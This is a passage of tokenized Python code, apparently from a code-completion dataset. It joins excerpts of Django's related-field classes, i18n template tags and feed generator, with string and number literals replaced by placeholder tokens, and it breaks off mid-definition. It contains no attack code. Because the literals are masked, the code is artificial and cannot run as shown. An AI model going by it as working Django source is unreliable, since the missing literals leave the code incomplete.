except AttributeError : <EOL> assert isinstance ( to , six . string_types ) , "<STR_LIT>" % ( self . __class__ . __name__ , to , RECURSIVE_RELATIONSHIP_CONSTANT ) <EOL> else : <EOL> assert not to . _meta . abstract , "<STR_LIT>" % ( self . __class__ . __name__ , to . _meta . object_name ) <EOL> to_field = to_field or ( to . _meta . pk and to . _meta . pk . name ) <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , None ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = rel_class ( to , to_field , <EOL> related_name = kwargs . pop ( '<STR_LIT:related_name>' , None ) , <EOL> limit_choices_to = kwargs . pop ( '<STR_LIT>' , None ) , <EOL> parent_link = kwargs . pop ( '<STR_LIT>' , False ) , <EOL> on_delete = kwargs . pop ( '<STR_LIT>' , CASCADE ) , <EOL> ) <EOL> Field . __init__ ( self , ** kwargs ) <EOL> def validate ( self , value , model_instance ) : <EOL> if self . rel . parent_link : <EOL> return <EOL> super ( ForeignKey , self ) . validate ( value , model_instance ) <EOL> if value is None : <EOL> return <EOL> using = router . db_for_read ( model_instance . __class__ , instance = model_instance ) <EOL> qs = self . rel . to . _default_manager . using ( using ) . filter ( <EOL> ** { self . rel . field_name : value } <EOL> ) <EOL> qs = qs . complex_filter ( self . rel . limit_choices_to ) <EOL> if not qs . exists ( ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] % { <EOL> '<STR_LIT>' : self . rel . to . _meta . verbose_name , '<STR_LIT>' : value } ) <EOL> def get_attname ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def get_validator_unique_lookup_type ( self ) : <EOL> return '<STR_LIT>' % ( self . name , self . rel . get_related_field ( ) . name ) <EOL> def get_default ( self ) : <EOL> "<STR_LIT>" <EOL> field_default = super ( ForeignKey , self ) . get_default ( ) <EOL> if isinstance ( field_default , self . rel . to ) : <EOL> return getattr ( field_default , self . rel . get_related_field ( ) . attname ) <EOL> return field_default <EOL> def get_db_prep_save ( self , value , connection ) : <EOL> if value == '<STR_LIT>' or value == None : <EOL> return None <EOL> else : <EOL> return self . rel . get_related_field ( ) . get_db_prep_save ( value , <EOL> connection = connection ) <EOL> def value_to_string ( self , obj ) : <EOL> if not obj : <EOL> if not self . blank and self . choices : <EOL> choice_list = self . get_choices_default ( ) <EOL> if len ( choice_list ) == <NUM_LIT:2> : <EOL> return smart_text ( choice_list [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> return Field . value_to_string ( self , obj ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> super ( ForeignKey , self ) . contribute_to_class ( cls , name ) <EOL> setattr ( cls , self . name , ReverseSingleRelatedObjectDescriptor ( self ) ) <EOL> if isinstance ( self . rel . to , six . string_types ) : <EOL> target = self . rel . to <EOL> else : <EOL> target = self . rel . to . _meta . db_table <EOL> cls . _meta . duplicate_targets [ self . column ] = ( target , "<STR_LIT>" ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> if not self . rel . is_hidden ( ) and not related . model . _meta . swapped : <EOL> setattr ( cls , related . get_accessor_name ( ) , ForeignRelatedObjectsDescriptor ( related ) ) <EOL> if self . rel . limit_choices_to : <EOL> cls . _meta . related_fkey_lookups . append ( self . rel . limit_choices_to ) <EOL> if self . rel . field_name is None : <EOL> self . rel . field_name = cls . _meta . pk . name <EOL> def formfield ( self , ** kwargs ) : <EOL> db = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if isinstance ( self . rel . to , six . string_types ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . name , self . rel . to ) ) <EOL> defaults = { <EOL> '<STR_LIT>' : forms . ModelChoiceField , <EOL> '<STR_LIT>' : self . rel . to . _default_manager . using ( db ) . complex_filter ( self . rel . limit_choices_to ) , <EOL> '<STR_LIT>' : self . rel . field_name , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( ForeignKey , self ) . formfield ( ** defaults ) <EOL> def db_type ( self , connection ) : <EOL> rel_field = self . rel . get_related_field ( ) <EOL> if ( isinstance ( rel_field , AutoField ) or <EOL> ( not connection . features . related_fields_match_type and <EOL> isinstance ( rel_field , ( PositiveIntegerField , <EOL> PositiveSmallIntegerField ) ) ) ) : <EOL> return IntegerField ( ) . db_type ( connection = connection ) <EOL> return rel_field . db_type ( connection = connection ) <EOL> class OneToOneField ( ForeignKey ) : <EOL> """<STR_LIT>""" <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , to , to_field = None , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> super ( OneToOneField , self ) . __init__ ( to , to_field , OneToOneRel , ** kwargs ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> setattr ( cls , related . get_accessor_name ( ) , <EOL> SingleRelatedObjectDescriptor ( related ) ) <EOL> def formfield ( self , ** kwargs ) : <EOL> if self . rel . parent_link : <EOL> return None <EOL> return super ( OneToOneField , self ) . formfield ( ** kwargs ) <EOL> def save_form_data ( self , instance , data ) : <EOL> if isinstance ( data , self . rel . to ) : <EOL> setattr ( instance , self . name , data ) <EOL> else : <EOL> setattr ( instance , self . attname , data ) <EOL> def create_many_to_many_intermediary_model ( field , klass ) : <EOL> from django . db import models <EOL> managed = True <EOL> if isinstance ( field . rel . to , six . string_types ) and field . rel . to != RECURSIVE_RELATIONSHIP_CONSTANT : <EOL> to_model = field . rel . to <EOL> to = to_model . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> def set_managed ( field , model , cls ) : <EOL> field . rel . through . _meta . managed = model . _meta . managed or cls . _meta . managed <EOL> add_lazy_relation ( klass , field , to_model , set_managed ) <EOL> elif isinstance ( field . rel . to , six . string_types ) : <EOL> to = klass . _meta . object_name <EOL> to_model = klass <EOL> managed = klass . _meta . managed <EOL> else : <EOL> to = field . rel . to . _meta . object_name <EOL> to_model = field . rel . to <EOL> managed = klass . _meta . managed or to_model . _meta . managed <EOL> name = '<STR_LIT>' % ( klass . _meta . object_name , field . name ) <EOL> if field . rel . to == RECURSIVE_RELATIONSHIP_CONSTANT or to == klass . _meta . object_name : <EOL> from_ = '<STR_LIT>' % to . lower ( ) <EOL> to = '<STR_LIT>' % to . lower ( ) <EOL> else : <EOL> from_ = klass . _meta . object_name . lower ( ) <EOL> to = to . lower ( ) <EOL> meta = type ( '<STR_LIT:Meta>' , ( object , ) , { <EOL> '<STR_LIT>' : field . _get_m2m_db_table ( klass . _meta ) , <EOL> '<STR_LIT>' : managed , <EOL> '<STR_LIT>' : klass , <EOL> '<STR_LIT>' : klass . _meta . app_label , <EOL> '<STR_LIT>' : klass . _meta . db_tablespace , <EOL> '<STR_LIT>' : ( from_ , to ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % { '<STR_LIT>' : from_ , '<STR_LIT:to>' : to } , <EOL> '<STR_LIT>' : '<STR_LIT>' % { '<STR_LIT>' : from_ , '<STR_LIT:to>' : to } , <EOL> } ) <EOL> return type ( name , ( models . Model , ) , { <EOL> '<STR_LIT:Meta>' : meta , <EOL> '<STR_LIT>' : klass . __module__ , <EOL> from_ : models . ForeignKey ( klass , related_name = '<STR_LIT>' % name , db_tablespace = field . db_tablespace ) , <EOL> to : models . ForeignKey ( to_model , related_name = '<STR_LIT>' % name , db_tablespace = field . db_tablespace ) <EOL> } ) <EOL> class ManyToManyField ( RelatedField , Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , to , ** kwargs ) : <EOL> try : <EOL> assert not to . _meta . abstract , "<STR_LIT>" % ( self . __class__ . __name__ , to . _meta . object_name ) <EOL> except AttributeError : <EOL> assert isinstance ( to , six . string_types ) , "<STR_LIT>" % ( self . __class__ . __name__ , to , RECURSIVE_RELATIONSHIP_CONSTANT ) <EOL> to = str ( to ) <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , None ) <EOL> kwargs [ '<STR_LIT>' ] = ManyToManyRel ( to , <EOL> related_name = kwargs . pop ( '<STR_LIT:related_name>' , None ) , <EOL> limit_choices_to = kwargs . pop ( '<STR_LIT>' , None ) , <EOL> symmetrical = kwargs . pop ( '<STR_LIT>' , to == RECURSIVE_RELATIONSHIP_CONSTANT ) , <EOL> through = kwargs . pop ( '<STR_LIT>' , None ) ) <EOL> self . db_table = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if kwargs [ '<STR_LIT>' ] . through is not None : <EOL> assert self . db_table is None , "<STR_LIT>" <EOL> Field . __init__ ( self , ** kwargs ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . help_text = string_concat ( self . help_text , '<STR_LIT:U+0020>' , msg ) <EOL> def get_choices_default ( self ) : <EOL> return Field . get_choices ( self , include_blank = False ) <EOL> def _get_m2m_db_table ( self , opts ) : <EOL> "<STR_LIT>" <EOL> if self . rel . through is not None : <EOL> return self . rel . through . _meta . db_table <EOL> elif self . db_table : <EOL> return self . db_table <EOL> else : <EOL> return util . truncate_name ( '<STR_LIT>' % ( opts . db_table , self . name ) , <EOL> connection . ops . max_name_length ( ) ) <EOL> def _get_m2m_attr ( self , related , attr ) : <EOL> "<STR_LIT>" <EOL> cache_attr = '<STR_LIT>' % attr <EOL> if hasattr ( self , cache_attr ) : <EOL> return getattr ( self , cache_attr ) <EOL> for f in self . rel . through . _meta . fields : <EOL> if hasattr ( f , '<STR_LIT>' ) and f . rel and f . rel . to == related . model : <EOL> setattr ( self , cache_attr , getattr ( f , attr ) ) <EOL> return getattr ( self , cache_attr ) <EOL> def _get_m2m_reverse_attr ( self , related , attr ) : <EOL> "<STR_LIT>" <EOL> cache_attr = '<STR_LIT>' % attr <EOL> if hasattr ( self , cache_attr ) : <EOL> return getattr ( self , cache_attr ) <EOL> found = False <EOL> for f in self . rel . through . _meta . fields : <EOL> if hasattr ( f , '<STR_LIT>' ) and f . rel and f . rel . to == related . parent_model : <EOL> if related . model == related . parent_model : <EOL> if found : <EOL> setattr ( self , cache_attr , getattr ( f , attr ) ) <EOL> break <EOL> else : <EOL> found = True <EOL> else : <EOL> setattr ( self , cache_attr , getattr ( f , attr ) ) <EOL> break <EOL> return getattr ( self , cache_attr ) <EOL> def value_to_string ( self , obj ) : <EOL> data = '<STR_LIT>' <EOL> if obj : <EOL> qs = getattr ( obj , self . name ) . all ( ) <EOL> data = [ instance . _get_pk_val ( ) for instance in qs ] <EOL> else : <EOL> if not self . blank : <EOL> choices_list = self . get_choices_default ( ) <EOL> if len ( choices_list ) == <NUM_LIT:1> : <EOL> data = [ choices_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> return smart_text ( data ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> if self . rel . symmetrical and ( self . rel . to == "<STR_LIT>" or self . rel . to == cls . _meta . object_name ) : <EOL> self . rel . related_name = "<STR_LIT>" % name <EOL> super ( ManyToManyField , self ) . contribute_to_class ( cls , name ) <EOL> if not self . rel . through and not cls . _meta . abstract and not cls . _meta . swapped : <EOL> self . rel . through = create_many_to_many_intermediary_model ( self , cls ) <EOL> setattr ( cls , self . name , ReverseManyRelatedObjectsDescriptor ( self ) ) <EOL> self . m2m_db_table = curry ( self . _get_m2m_db_table , cls . _meta ) <EOL> if isinstance ( self . rel . through , six . string_types ) : <EOL> def resolve_through_model ( field , model , cls ) : <EOL> field . rel . through = model <EOL> add_lazy_relation ( cls , self , self . rel . through , resolve_through_model ) <EOL> if isinstance ( self . rel . to , six . string_types ) : <EOL> target = self . rel . to <EOL> else : <EOL> target = self . rel . to . _meta . db_table <EOL> cls . _meta . duplicate_targets [ self . column ] = ( target , "<STR_LIT>" ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> if not self . rel . is_hidden ( ) and not related . model . _meta . swapped : <EOL> setattr ( cls , related . get_accessor_name ( ) , ManyRelatedObjectsDescriptor ( related ) ) <EOL> self . m2m_column_name = curry ( self . _get_m2m_attr , related , '<STR_LIT>' ) <EOL> self . m2m_reverse_name = curry ( self . _get_m2m_reverse_attr , related , '<STR_LIT>' ) <EOL> self . m2m_field_name = curry ( self . _get_m2m_attr , related , '<STR_LIT:name>' ) <EOL> self . m2m_reverse_field_name = curry ( self . _get_m2m_reverse_attr , related , '<STR_LIT:name>' ) <EOL> get_m2m_rel = curry ( self . _get_m2m_attr , related , '<STR_LIT>' ) <EOL> self . m2m_target_field_name = lambda : get_m2m_rel ( ) . field_name <EOL> get_m2m_reverse_rel = curry ( self . _get_m2m_reverse_attr , related , '<STR_LIT>' ) <EOL> self . m2m_reverse_target_field_name = lambda : get_m2m_reverse_rel ( ) . field_name <EOL> def set_attributes_from_rel ( self ) : <EOL> pass <EOL> def value_from_object ( self , obj ) : <EOL> "<STR_LIT>" <EOL> return getattr ( obj , self . attname ) . all ( ) <EOL> def save_form_data ( self , instance , data ) : <EOL> setattr ( instance , self . attname , data ) <EOL> def formfield ( self , ** kwargs ) : <EOL> db = kwargs . pop ( '<STR_LIT>' , None ) <EOL> defaults = { <EOL> '<STR_LIT>' : forms . ModelMultipleChoiceField , <EOL> '<STR_LIT>' : self . rel . to . _default_manager . using ( db ) . complex_filter ( self . rel . limit_choices_to ) <EOL> } <EOL> defaults . update ( kwargs ) <EOL> if defaults . get ( '<STR_LIT>' ) is not None : <EOL> initial = defaults [ '<STR_LIT>' ] <EOL> if callable ( initial ) : <EOL> initial = initial ( ) <EOL> defaults [ '<STR_LIT>' ] = [ i . _get_pk_val ( ) for i in initial ] <EOL> return super ( ManyToManyField , self ) . formfield ( ** defaults ) <EOL> def db_type ( self , connection ) : <EOL> return None </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from django . template import ( Node , Variable , TemplateSyntaxError , <EOL> TokenParser , Library , TOKEN_TEXT , TOKEN_VAR ) <EOL> from django . template . base import _render_value_in_context <EOL> from django . template . defaulttags import token_kwargs <EOL> from django . utils import six <EOL> from django . utils import translation <EOL> register = Library ( ) <EOL> class GetAvailableLanguagesNode ( Node ) : <EOL> def __init__ ( self , variable ) : <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> from django . conf import settings <EOL> context [ self . variable ] = [ ( k , translation . ugettext ( v ) ) for k , v in settings . LANGUAGES ] <EOL> return '<STR_LIT>' <EOL> class GetLanguageInfoNode ( Node ) : <EOL> def __init__ ( self , lang_code , variable ) : <EOL> self . lang_code = Variable ( lang_code ) <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> lang_code = self . lang_code . resolve ( context ) <EOL> context [ self . variable ] = translation . get_language_info ( lang_code ) <EOL> return '<STR_LIT>' <EOL> class GetLanguageInfoListNode ( Node ) : <EOL> def __init__ ( self , languages , variable ) : <EOL> self . languages = Variable ( languages ) <EOL> self . variable = variable <EOL> def get_language_info ( self , language ) : <EOL> if len ( language [ <NUM_LIT:0> ] ) > <NUM_LIT:1> : <EOL> return translation . get_language_info ( language [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return translation . get_language_info ( str ( language ) ) <EOL> def render ( self , context ) : <EOL> langs = self . languages . resolve ( context ) <EOL> context [ self . variable ] = [ self . get_language_info ( lang ) for lang in langs ] <EOL> return '<STR_LIT>' <EOL> class GetCurrentLanguageNode ( Node ) : <EOL> def __init__ ( self , variable ) : <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> context [ self . variable ] = translation . get_language ( ) <EOL> return '<STR_LIT>' <EOL> class GetCurrentLanguageBidiNode ( Node ) : <EOL> def __init__ ( self , variable ) : <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> context [ self . variable ] = translation . get_language_bidi ( ) <EOL> return '<STR_LIT>' <EOL> class TranslateNode ( Node ) : <EOL> def __init__ ( self , filter_expression , noop , asvar = None , <EOL> message_context = None ) : <EOL> self . noop = noop <EOL> self . asvar = asvar <EOL> self . message_context = message_context <EOL> self . filter_expression = filter_expression <EOL> if isinstance ( self . filter_expression . var , six . string_types ) : <EOL> self . filter_expression . var = Variable ( "<STR_LIT>" % <EOL> self . filter_expression . var ) <EOL> def render ( self , context ) : <EOL> self . filter_expression . var . translate = not self . noop <EOL> if self . message_context : <EOL> self . filter_expression . var . message_context = ( <EOL> self . message_context . resolve ( context ) ) <EOL> output = self . filter_expression . resolve ( context ) <EOL> value = _render_value_in_context ( output , context ) <EOL> if self . asvar : <EOL> context [ self . asvar ] = value <EOL> return '<STR_LIT>' <EOL> else : <EOL> return value <EOL> class BlockTranslateNode ( Node ) : <EOL> def __init__ ( self , extra_context , singular , plural = None , countervar = None , <EOL> counter = None , message_context = None ) : <EOL> self . extra_context = extra_context <EOL> self . singular = singular <EOL> self . plural = plural <EOL> self . countervar = countervar <EOL> self . counter = counter <EOL> self . message_context = message_context <EOL> def render_token_list ( self , tokens ) : <EOL> result = [ ] <EOL> vars = [ ] <EOL> for token in tokens : <EOL> if token . token_type == TOKEN_TEXT : <EOL> result . append ( token . contents . replace ( '<STR_LIT:%>' , '<STR_LIT>' ) ) <EOL> elif token . token_type == TOKEN_VAR : <EOL> result . append ( '<STR_LIT>' % token . contents ) <EOL> vars . append ( token . contents ) <EOL> return '<STR_LIT>' . join ( result ) , vars <EOL> def render ( self , context , nested = False ) : <EOL> if self . message_context : <EOL> message_context = self . message_context . resolve ( context ) <EOL> else : <EOL> message_context = None <EOL> tmp_context = { } <EOL> for var , val in self . extra_context . items ( ) : <EOL> tmp_context [ var ] = val . resolve ( context ) <EOL> context . update ( tmp_context ) <EOL> singular , vars = self . render_token_list ( self . singular ) <EOL> if self . plural and self . countervar and self . counter : <EOL> count = self . counter . resolve ( context ) <EOL> context [ self . countervar ] = count <EOL> plural , plural_vars = self . render_token_list ( self . plural ) <EOL> if message_context : <EOL> result = translation . npgettext ( message_context , singular , <EOL> plural , count ) <EOL> else : <EOL> result = translation . ungettext ( singular , plural , count ) <EOL> vars . extend ( plural_vars ) <EOL> else : <EOL> if message_context : <EOL> result = translation . pgettext ( message_context , singular ) <EOL> else : <EOL> result = translation . ugettext ( singular ) <EOL> data = dict ( [ ( v , _render_value_in_context ( context . get ( v , '<STR_LIT>' ) , context ) ) for v in vars ] ) <EOL> context . pop ( ) <EOL> try : <EOL> result = result % data <EOL> except ( KeyError , ValueError ) : <EOL> if nested : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( result , data ) ) <EOL> with translation . override ( None ) : <EOL> result = self . render ( context , nested = True ) <EOL> return result <EOL> class LanguageNode ( Node ) : <EOL> def __init__ ( self , nodelist , language ) : <EOL> self . nodelist = nodelist <EOL> self . language = language <EOL> def render ( self , context ) : <EOL> with translation . override ( self . language . resolve ( context ) ) : <EOL> output = self . nodelist . render ( context ) <EOL> return output <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_available_languages ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:3> or args [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % args ) <EOL> return GetAvailableLanguagesNode ( args [ <NUM_LIT:2> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_language_info ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:5> or args [ <NUM_LIT:1> ] != '<STR_LIT>' or args [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % ( args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> : ] ) ) <EOL> return GetLanguageInfoNode ( args [ <NUM_LIT:2> ] , args [ <NUM_LIT:4> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_language_info_list ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:5> or args [ <NUM_LIT:1> ] != '<STR_LIT>' or args [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % ( args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> : ] ) ) <EOL> return GetLanguageInfoListNode ( args [ <NUM_LIT:2> ] , args [ <NUM_LIT:4> ] ) <EOL> @ register . filter <EOL> def language_name ( lang_code ) : <EOL> return translation . get_language_info ( lang_code ) [ '<STR_LIT:name>' ] <EOL> @ register . filter <EOL> def language_name_local ( lang_code ) : <EOL> return translation . get_language_info ( lang_code ) [ '<STR_LIT>' ] <EOL> @ register . filter <EOL> def language_bidi ( lang_code ) : <EOL> return translation . get_language_info ( lang_code ) [ '<STR_LIT>' ] <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_current_language ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:3> or args [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % args ) <EOL> return GetCurrentLanguageNode ( args [ <NUM_LIT:2> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_current_language_bidi ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:3> or args [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % args ) <EOL> return GetCurrentLanguageBidiNode ( args [ <NUM_LIT:2> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_translate ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> class TranslateParser ( TokenParser ) : <EOL> def top ( self ) : <EOL> value = self . value ( ) <EOL> if value [ <NUM_LIT:0> ] == "<STR_LIT:'>" : <EOL> m = re . match ( "<STR_LIT>" , value ) <EOL> if m : <EOL> value = '<STR_LIT>' % ( m . group ( <NUM_LIT:1> ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) , m . group ( <NUM_LIT:2> ) ) <EOL> elif value [ - <NUM_LIT:1> ] == "<STR_LIT:'>" : <EOL> value = '<STR_LIT>' % value [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> noop = False <EOL> asvar = None <EOL> message_context = None <EOL> while self . more ( ) : <EOL> tag = self . tag ( ) <EOL> if tag == '<STR_LIT>' : <EOL> noop = True <EOL> elif tag == '<STR_LIT>' : <EOL> message_context = parser . compile_filter ( self . value ( ) ) <EOL> elif tag == '<STR_LIT>' : <EOL> asvar = self . tag ( ) <EOL> else : <EOL> raise TemplateSyntaxError ( <EOL> "<STR_LIT>" "<STR_LIT>" ) <EOL> return value , noop , asvar , message_context <EOL> value , noop , asvar , message_context = TranslateParser ( token . contents ) . top ( ) <EOL> return TranslateNode ( parser . compile_filter ( value ) , noop , asvar , <EOL> message_context ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_block_translate ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . split_contents ( ) <EOL> options = { } <EOL> remaining_bits = bits [ <NUM_LIT:1> : ] <EOL> while remaining_bits : <EOL> option = remaining_bits . pop ( <NUM_LIT:0> ) <EOL> if option in options : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % option ) <EOL> if option == '<STR_LIT>' : <EOL> value = token_kwargs ( remaining_bits , parser , support_legacy = True ) <EOL> if not value : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> elif option == '<STR_LIT:count>' : <EOL> value = token_kwargs ( remaining_bits , parser , support_legacy = True ) <EOL> if len ( value ) != <NUM_LIT:1> : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> elif option == "<STR_LIT>" : <EOL> try : <EOL> value = remaining_bits . pop ( <NUM_LIT:0> ) <EOL> value = parser . compile_filter ( value ) <EOL> except Exception : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % <EOL> ( bits [ <NUM_LIT:0> ] , option ) ) <EOL> options [ option ] = value <EOL> if '<STR_LIT:count>' in options : <EOL> countervar , counter = list ( six . iteritems ( options [ '<STR_LIT:count>' ] ) ) [ <NUM_LIT:0> ] <EOL> else : <EOL> countervar , counter = None , None <EOL> if '<STR_LIT>' in options : <EOL> message_context = options [ '<STR_LIT>' ] <EOL> else : <EOL> message_context = None <EOL> extra_context = options . get ( '<STR_LIT>' , { } ) <EOL> singular = [ ] <EOL> plural = [ ] <EOL> while parser . tokens : <EOL> token = parser . next_token ( ) <EOL> if token . token_type in ( TOKEN_VAR , TOKEN_TEXT ) : <EOL> singular . append ( token ) <EOL> else : <EOL> break <EOL> if countervar and counter : <EOL> if token . contents . strip ( ) != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" ) <EOL> while parser . tokens : <EOL> token = parser . next_token ( ) <EOL> if token . token_type in ( TOKEN_VAR , TOKEN_TEXT ) : <EOL> plural . append ( token ) <EOL> else : <EOL> break <EOL> if token . contents . strip ( ) != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % token . contents ) <EOL> return BlockTranslateNode ( extra_context , singular , plural , countervar , <EOL> counter , message_context ) <EOL> @ register . tag <EOL> def language ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> language = parser . compile_filter ( bits [ <NUM_LIT:1> ] ) <EOL> nodelist = parser . parse ( ( '<STR_LIT>' , ) ) <EOL> parser . delete_first_token ( ) <EOL> return LanguageNode ( nodelist , language ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import datetime <EOL> try : <EOL> from urllib . parse import urlparse <EOL> except ImportError : <EOL> from urlparse import urlparse <EOL> from django . utils . xmlutils import SimplerXMLGenerator <EOL> from django . utils . encoding import force_text , iri_to_uri <EOL> from django . utils import datetime_safe <EOL> from django . utils import six <EOL> from django . utils . six import StringIO <EOL> from django . utils . timezone import is_aware <EOL> def rfc2822_date ( date ) : <EOL> months = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> days = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> date = datetime_safe . new_datetime ( date ) <EOL> dow = days [ date . weekday ( ) ] <EOL> month = months [ date . month - <NUM_LIT:1> ] <EOL> time_str = date . strftime ( '<STR_LIT>' % ( dow , month ) ) <EOL> if not six . PY3 : <EOL> time_str = time_str . decode ( '<STR_LIT:utf-8>' ) <EOL> if is_aware ( date ) : <EOL> offset = date . tzinfo . utcoffset ( date ) <EOL> timezone = ( offset . days * <NUM_LIT> * <NUM_LIT> ) + ( offset . seconds // <NUM_LIT> ) <EOL> hour , minute = divmod ( timezone , <NUM_LIT> ) <EOL> return time_str + '<STR_LIT>' % ( hour , minute ) <EOL> else : <EOL> return time_str + '<STR_LIT>' <EOL> def rfc3339_date ( date ) : <EOL> date = datetime_safe . new_datetime ( date ) <EOL> time_str = date . strftime ( '<STR_LIT>' ) <EOL> if not six . PY3 : <EOL> time_str = time_str . decode ( '<STR_LIT:utf-8>' ) <EOL> if is_aware ( date ) : <EOL> offset = date . tzinfo . utcoffset ( date ) <EOL> timezone = ( offset . days * <NUM_LIT> * <NUM_LIT> ) + ( offset . seconds // <NUM_LIT> ) <EOL> hour , minute = divmod ( timezone , <NUM_LIT> ) <EOL> return time_str + '<STR_LIT>' % ( hour , minute ) <EOL> else : <EOL> return time_str + '<STR_LIT>' <EOL> def get_tag_uri ( url , date ) : <EOL> """<STR_LIT>""" <EOL> bits = urlparse ( url ) <EOL> d = '<STR_LIT>' <EOL> if date is not None : <EOL> d = '<STR_LIT>' % datetime_safe . new_datetime ( date ) . strftime ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' % ( bits . hostname , d , bits . path , bits . fragment ) <EOL> class SyndicationFeed ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , title , link , description , language = None , author_email = None , <EOL> author_name = None , author_link = None , subtitle = None , categories = None , <EOL> feed_url = None , feed_copyright = None , feed_guid = None , ttl = None , ** kwargs ) : <EOL> to_unicode = lambda s : force_text ( s , strings_only = True ) <EOL> if categories : <EOL> categories = [ force_text ( c ) for c in categories ] <EOL> if ttl is not None : <EOL> ttl = force_text ( ttl ) <EOL> self . feed = { <EOL> '<STR_LIT:title>' : to_unicode ( title ) , <EOL> '<STR_LIT>' : iri_to_uri ( link ) , <EOL> '<STR_LIT:description>' : to_unicode ( description ) , <EOL> '<STR_LIT>' : to_unicode ( language ) , <EOL> '<STR_LIT>' : to_unicode ( author_email ) , <EOL> '<STR_LIT>' : to_unicode ( author_name ) , <EOL> '<STR_LIT>' : iri_to_uri ( author_link ) , <EOL> '<STR_LIT>' : to_unicode ( subtitle ) , <EOL> '<STR_LIT>' : categories or ( ) , <EOL> '<STR_LIT>' : iri_to_uri ( feed_url ) , <EOL> '<STR_LIT>' : to_unicode ( feed_copyright ) , <EOL> 